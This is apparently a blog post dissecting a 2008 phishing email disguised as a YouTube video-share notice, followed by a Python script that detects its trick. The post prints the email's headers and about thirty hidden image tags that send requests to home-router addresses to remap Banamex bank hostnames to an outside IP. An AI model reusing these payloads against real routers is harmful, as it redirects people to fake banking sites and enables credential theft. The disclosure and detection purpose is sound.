Today, while going through my mail, I found a message from:
Date: Thu, 08 May 2008 17:20:10 +0300
From: service@youtube.com
To: luis.perez
Subject: carlosm34 te ha enviado un video
To read the company mail I use pine, a text-based mail client that I run from the command line. I like it because it is fast, and its delete commands let me quickly get rid of the messages that arrive in bulk.
The first lines of the message looked like the ones sent by service@youtube.com, but at the end of the message there were some very suspicious lines:
[xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=banamex.com&ADDR=66.116.199.134 alt=]
[xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.banamex.com&ADDR=66.116.199.134 alt=]
When I looked at the raw file of the message, a lot more showed up:
Headers:
From nobody@palvelin1.ammuu.com Thu May 8 09:21:23 2008
X-UIDL: 7]Y!!7AW"!+;o"!Qgn"!
Return-Path:
X-Spam-Checker-Version: SpamAssassin 3.1.8 (2007-02-13) on chamba.com.mx
X-Spam-Level:
X-Spam-Status: No, score=-2.4 required=5.0 tests=BAYES_00,HTML_MESSAGE,
MIME_HTML_ONLY,NORMAL_HTTP_TO_IP autolearn=ham version=3.1.8
X-Original-To: yo.mero@chamba.com.mx
Delivered-To: yo.mero@chamba.com.mx
Received: from localhost (localhost [127.0.0.1])
by chamba.com.mx (Postfix) with ESMTP id 6981115074F
for; Thu, 8 May 2008 09:21:23 -0500 (CDT)
Received: from chamba.com.mx ([127.0.0.1])
by localhost (chamba.com.mx [127.0.0.1]) (amavisd-new, port 10024)
with ESMTP id 24642-10 for;
Thu, 8 May 2008 09:20:32 -0500 (CDT)
Received: from palvelin1.ammuu.com (palvelin1.ammuu.com [217.67.237.142])
by chamba.com.mx (Postfix) with ESMTP id E145E150770
for; Thu, 8 May 2008 09:20:27 -0500 (CDT)
Received: from nobody by palvelin1.ammuu.com with local (Exim 4.63)
(envelope-from)
id 1Ju6z3-0007jV-Cs
for yo.mero@chamba.com.mx; Thu, 08 May 2008 17:20:10 +0300
To: yo.mero@chamba.com.mx
Subject: carlosm34 te ha enviado un video
From: service@youtube.com
Reply-To: service@youtube.com
MIME-Version: 1.0
Content-Type: text/html
Content-Transfer-Encoding: 8bit
Message-Id:
Date: Thu, 08 May 2008 17:20:10 +0300
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - palvelin1.ammuu.com
X-AntiAbuse: Original Domain - chamba.com.mx
X-AntiAbuse: Originator/Caller UID/GID - [99 500] / [47 12]
X-AntiAbuse: Sender Address Domain - palvelin1.ammuu.com
X-Source:
X-Source-Args: /usr/local/apache/bin/httpd -DSSL
X-Source-Dir: leffamaa.com:/public_html
X-Virus-Scanned: amavisd-new at chamba.com.mx
Status: RO
X-Status:
X-Keywords:
X-UID: 1247
Appearance:
YouTube Broadcast Yourself™
carlosm34 wants to share a video with you.
Video description
you can see the slow decomposition of an apple, take a look...
Personal message
look at that
To accept my friend's request, click here.
To send a reply to carlosm34, click here.
Thanks,
carlosm34
Using YouTube
YouTube Help
Check the Help Center for answers to common questions.
Your account settings
To change your preferences, settings or personal information, go to the "My account" section.
E-mail notifications
To change or cancel YouTube e-mail notifications, go to the "E-mail options" section of your profile.
Report spam e-mail
If this is a spam e-mail message, report it.
© 2008 YouTube, Inc.
Strange strings:
img alt="" src="http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=banamex.com&ADDR=66.116.199.134 alt="
img alt="" src="http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.banamex.com&ADDR=66.116.199.134 alt="
img alt="" src="http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=banamex.com.mx&ADDR=66.116.199.134 alt="
img alt="" src="http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.banamex.com.mx&ADDR=66.116.199.134 alt="
img alt="" src="http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.bancanetempresarial.banamex.com.mx&ADDR=66.116.199.134 alt="
img alt="" src="http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=bancanetempresarial.banamex.com.mx&ADDR=66.116.199.134 alt="
img alt="" src="http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=boveda.banamex.com.mx&ADDR=66.116.199.134 alt="
img alt="" src="http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.boveda.banamex.com.mx&ADDR=66.116.199.134 alt="
img alt="" src="http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=boveda.banamex.com&ADDR=66.116.199.134 alt="
img alt="" src="http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.boveda.banamex.com&ADDR=66.116.199.134 alt="
img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=banamex.com&ADDR=66.116.199.134 alt="
img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.banamex.com&ADDR=66.116.199.134 alt="
img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=banamex.com.mx&ADDR=66.116.199.134 alt="
img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.banamex.com.mx&ADDR=66.116.199.134 alt="
img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.bancanetempresarial.banamex.com.mx&ADDR=66.116.199.134 alt="
img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=bancanetempresarial.banamex.com.mx&ADDR=66.116.199.134 alt="
img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=boveda.banamex.com.mx&ADDR=66.116.199.134 alt="
img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.boveda.banamex.com.mx&ADDR=66.116.199.134 alt="
img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=boveda.banamex.com&ADDR=66.116.199.134 alt="
img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.boveda.banamex.com&ADDR=66.116.199.134 alt="
img alt="" src="http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=banamex.com&ADDR=66.116.199.134 alt="
img alt="" src="http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.banamex.com&ADDR=66.116.199.134 alt="
img alt="" src="http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.banamex.com.mx&ADDR=66.116.199.134 alt="
img alt="" src="http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=banamex.com.mx&ADDR=66.116.199.134 alt="
img alt="" src="http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.bancanetempresarial.banamex.com.mx&ADDR=66.116.199.134 alt="
img alt="" src="http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=bancanetempresarial.banamex.com.mx&ADDR=66.116.199.134 alt="
img alt="" src="http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=boveda.banamex.com.mx&ADDR=66.116.199.134 alt="
img alt="" src="http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.boveda.banamex.com.mx&ADDR=66.116.199.134 alt="
img alt="" src="http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=boveda.banamex.com&ADDR=66.116.199.134 alt="
img alt="" src="http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.boveda.banamex.com&ADDR=66.116.199.134 alt=">
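As an added example (not part of the original post), this Python sketch scans a message's HTML for image URLs like the ones above: requests aimed at a host on the reader's own network that pair a NAME hostname with an ADDR address. The sample input is constructed from three of the strings quoted above plus one ordinary image, and treating gateway.2wire.net as a local gateway name is an assumption.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample: three of the strings quoted above plus one ordinary remote image.
SAMPLE_HTML = """
<img alt="" src="http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=banamex.com&ADDR=66.116.199.134 alt=">
<img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.banamex.com&ADDR=66.116.199.134 alt=">
<img alt="" src="http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=boveda.banamex.com.mx&ADDR=66.116.199.134 alt=">
<img alt="logo" src="http://img.example.com/logo.gif">
"""

# Assumption: hostnames treated as "inside the reader's network"; this one comes from the message.
LOCAL_NAMES = {"gateway.2wire.net"}

def is_local_host(host):
    """True for private/loopback IP literals, single-label names and watchlisted names."""
    try:
        return ipaddress.ip_address(host).is_private
    except ValueError:
        return "." not in host or host.lower() in LOCAL_NAMES

def find_local_requests(html):
    """Return one finding per image URL that targets a local host."""
    findings = []
    for src in re.findall(r'src\s*=\s*"([^"]*)"', html, re.IGNORECASE):
        pieces = src.split()  # the message leaves ' alt=' inside the src value
        if not pieces:
            continue
        url = urlsplit(pieces[0])
        host = url.hostname or ""
        if not host or not is_local_host(host):
            continue
        query = parse_qs(url.query)
        findings.append({"target": host,
                         "name": query.get("NAME", [None])[0],
                         "addr": query.get("ADDR", [None])[0]})
    return findings

def attempted_mappings(findings):
    """Sorted unique (hostname, IP) pairs where a name is paired with a non-private IP."""
    pairs = set()
    for f in findings:
        try:
            if f["name"] and not ipaddress.ip_address(f["addr"] or "").is_private:
                pairs.add((f["name"], f["addr"]))
        except ValueError:
            continue
    return sorted(pairs)

if __name__ == "__main__":
    for name, addr in attempted_mappings(find_local_requests(SAMPLE_HTML)):
        print(f"{name} -> {addr}")
```

A mail filter could quarantine any message for which `find_local_requests` returns a non-empty list, since ordinary mail has no reason to load images from the recipient's own gateway.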